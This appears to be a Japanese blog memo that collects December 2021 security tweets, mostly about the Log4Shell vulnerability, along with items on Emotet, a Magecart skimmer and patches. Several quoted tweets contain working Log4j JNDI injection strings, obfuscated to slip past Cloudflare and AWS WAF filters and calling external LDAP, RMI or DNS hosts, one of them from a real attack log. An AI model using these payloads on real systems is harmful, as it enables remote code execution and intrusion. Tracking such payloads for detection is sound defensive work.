2021/12/30 セキュリティ関連Twitterメモ
Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF : https://t.co/f3Fi7E34TY
— H4x0r-DZ (@h4x0r_dz) Dec 11, 2021
Apache Log4j2 2.14.1 RCE (CVE-2021-44228) ??Bypass WAF 1. ${jndi:ldap://127.0.0.1:1389/ badClassName} 2. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} 3. ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} 4. ${jndi:rmi://adsasd.asdasd.asdasd}
— Jinwook Kim (@wugeej) Dec 12, 2021
これ、見る人がみればわかりますが、環境変数にAWS ACCESS KEYを設定している物をみつけて情報を摂取するものですね。名前解決をした時点でホストにKEY VALUEが載ってくるので、次の攻撃へと悪用するかと。 https://t.co/Gj5VgHTIlP
— hiro_ (@papa_anniekey) Dec 14, 2021
立法趣旨からは違法でないはずだが検挙されてしまう可能性があるのが現状、とでも書いてほしいところ / “「Log4j」の脆弱性を突く攻撃手段の情報共有は違法? 日本ハッカー協会に聞いた” https://t.co/hRPfZkBYV6
— 徳丸 浩 (@ockeghem) Dec 14, 2021
IC乗車券の利用日が約20年前になる障害、要因はGPS「週番号」のリセット https://t.co/lY50rvg4TL
— にゃん☆たく (@taku888infinity) Dec 14, 2021
MDIS、「統合認証サービス MistyAuth」を2022年4月から提供 https://t.co/2byZVgeD2B
— モグ|セキュリティゼネラリスト (@moneymog) Dec 14, 2021
この辺の動きは当然犯罪者もチェックしてるでしょうね。 みずほ銀行のQRコード決済「J-Coin Pay」 全国74の信用組合と口座接続開始 - ITmedia ビジネスオンライン https://t.co/c3kYAtXeac
— Autumn Good (@autumn_good_35) Dec 14, 2021
一番わかりやすい図解かと #log4shell #log4j https://t.co/Un40iU7VqZ
— 無気力マン (@__motojiro__) Dec 12, 2021
Scutumでは12/11時点でLog4j攻撃の難読化に対応が済んでいます。シグネチャ型のWAFだと難しそうですが、ウチは色々やれるので… https://t.co/ljXqa0oUzU
— Kanatoko (@kinyuka) Dec 13, 2021
Log4Shell脆弱性に対する追加の対処が施された「Apache Log4j 2.16.0」がリリース - 窓の杜 https://t.co/9tDh7RcnEx @madonomoriより
— にゃん☆たく (@taku888infinity) Dec 14, 2021
SECCON CTF 2021 writeup - st98 の日記帳 - コピー https://t.co/akm1PW6u39 書きました
— st98 (@st98_) Dec 14, 2021
Log4j の脆弱性の Port53 で通信を試行しようとしているもの。 (自宅のサーバにもこのパターンが着信したのでぺたり) https://t.co/8QSkwuayCS
— みむら (@mimura1133) Dec 15, 2021
なんかやってみた https://t.co/V9ShcymhZG
— hiro_ (@papa_anniekey) Dec 15, 2021
#Emotet のメール送信は12/10以降確認してません。 Emotetが11/26,30,12/7に使っていたAdobeを騙ったアプリインストーラーによる感染手法ですが、使われていた脆弱性 CVE-2021-43890 が本日配信された12月のWindowsUpdateで修正されましたので早期に更新しましょう。 https://t.co/WjW7Fvs82n
— bom (@bomccss) Dec 15, 2021
Ohh, the Russian IP that's doing Windows AD user recon switched to obfuscating "jndi" too: 45.146.164.160 - - [14/Dec/2021:07:18:35 +0200] "GET / HTTP/1.1" 403 135 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}"
— Vess (@VessOnSecurity) Dec 14, 2021
「Log4Shell」攻撃、少なくとも12月初頭より展開 - PoC公開以前についても確認を https://t.co/LxBiF22jGx 『現地時間12月2日には同脆弱性に関する攻撃者の活動が観測されていたことを明らかにし、同脆弱性に対する探索行為や悪用など調査する場合は、数週間前までさかのぼって調べるよう呼びかけた』
— にゃん☆たく (@taku888infinity) Dec 15, 2021
マカフィー、「2021年の10大セキュリティ事件」を発表、第1位は? https://t.co/bneTqxXNye
— モグ|セキュリティゼネラリスト (@moneymog) Dec 15, 2021
Just bypassed AWS WAF for log4j jndi injection: ${j${k8s:k5:-ND}i${sd:k5:-:}ldap://mydogsbutt.com:1389/o} Anyone who care to share Akamai Bypass? #bugbountytips https://t.co/QaoavD326z
— xxux11 ? ? (@11xuxx) Dec 15, 2021
鳥取県のシステムにサイバー攻撃 ファイル暗号化される被害|NHK 鳥取県 https://t.co/eBLCaii6D1 “被害にあったのは、県が東京の建設コンサルタント会社に運用を委託し、県内の森林所有者およそ5万人分の名前や、民有林の情報などを保管している「鳥取県森林クラウドシステム」というシステムです”
— ねこさん?(ΦωΦ) (@catnap707) Dec 16, 2021
Log4jの件では珍しく(?)難読化によるWAFの回避が話題になっていましたが、その辺についてブログ書いてみました。Scutumでは今回はシグネチャ・正規表現で頑張るのはキツイと判断して、独自にパーサを書いて対応しています。 https://t.co/r2Kkmjy4vS
— Kanatoko (@kinyuka) Dec 16, 2021
CERT/CC has released a Log4Shell scanner https://t.co/6SxzSwOTbR https://t.co/zHdTWcKVEf
— Catalin Cimpanu (@campuscodi) Dec 16, 2021
CVE-2021-45105(DoS脆弱性。CVSS値は 7.5)がまた1つ見つかり(lookupの無限再帰を起こすパターンが見つかった)、Log4jは2.17.0に…。Shellshockの時のbash泥沼修正の再来? / Apache Issues 3rd Patch to Fix New High-Severity Log4j Vulnerability https://t.co/0O7E1aUeMI via @TheHackersNews
— wakatono, Ph.D.(JK)(Fully Vaccinated)(3末までに休暇11日) (@wakatono) Dec 18, 2021
Looks like it’s missing the step where you post something on Twitter #log4j #logforge #l4j https://t.co/6zzGdpSuu0
— pwneip (@pwnEIP) Dec 18, 2021
Fridaを用いてマルウェアの動作を解析・変更する - NTT Communications Engineers' Blog https://t.co/7kPeipuWLV
— ほよたか (@takahoyo) Dec 21, 2021
obj_31337 skimmer via bootstrap2[.]xyz. Malicious JavaScript is hidden within victim's own logo. #Magecart https://t.co/86NpKF4CB9
— Malwarebytes Threat Intelligence (@MBThreatIntel) Dec 20, 2021
Nmap Cheatsheet for OSCP #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #linux #unix #nmap https://t.co/APWxN2nP9v
— Hacking Articles (@hackinarticles) Dec 21, 2021
Alert (AA21-356A) Mitigating Log4Shell and Other Log4j-Related Vulnerabilities https://t.co/KKJnEIBgcW
— piyokango (@piyokango) Dec 23, 2021
The day when the AWS Support got access to your S3 data. In this thread, you will find details about the security incident that leads to this unattended access for millions of AWS customers. ??
— Victor Grenu (@zoph) Dec 23, 2021
Log4j RCE CheatSheet https://t.co/wUNXWKiYf5
— LetsDefend (@LetsDefendIO) Dec 22, 2021
「Apache Log4j」の脆弱性を中国政府に最初に報告しなかったとしてAlibaba Cloudにペナルティ https://t.co/jTlGgRgu46
— モグ|セキュリティゼネラリスト (@moneymog) Dec 23, 2021
Microsoft MSHTMLの脆弱性「CVE-2021-40444」に対する修正パッチを回避する新たな攻撃 | TECH+ https://t.co/pnlqmwOfgI
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Dec 25, 2021
【独自】日米、「ランサムウェア」対策で連携へ…中露のサイバー攻撃を意識 : 政治 : ニュース : 読売新聞オンライン https://t.co/t9Fb5ViTr2
— 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Dec 26, 2021
JNSA版の十大ニュース。これを見ても、今年「も」色々あったなと思います。 JNSA 2021 セキュリティ十大ニュース発表、「ランサムウェアの脅威」「LINEデータ管理不備」「みずほ銀行」他 https://t.co/Z2hofX3QxR
— キタきつね (@foxbook) Dec 27, 2021
書きました>スクリーンショットによるツイート引用は著作権侵害との判決(栗原潔) - 個人 - Yahoo!ニュース https://t.co/N1XZ0yZD3C
— Kiyoshi Kurihara (@kurikiyo) Dec 29, 2021
この判決だとテレビがツイートを無断引用するのは全て著作権侵害だな。(著作権法の引用の趣旨がそんなものなわけがなかろうて。) https://t.co/wTEPfbxH6m
— Hiromitsu Takagi (@HiromitsuTakagi) Dec 29, 2021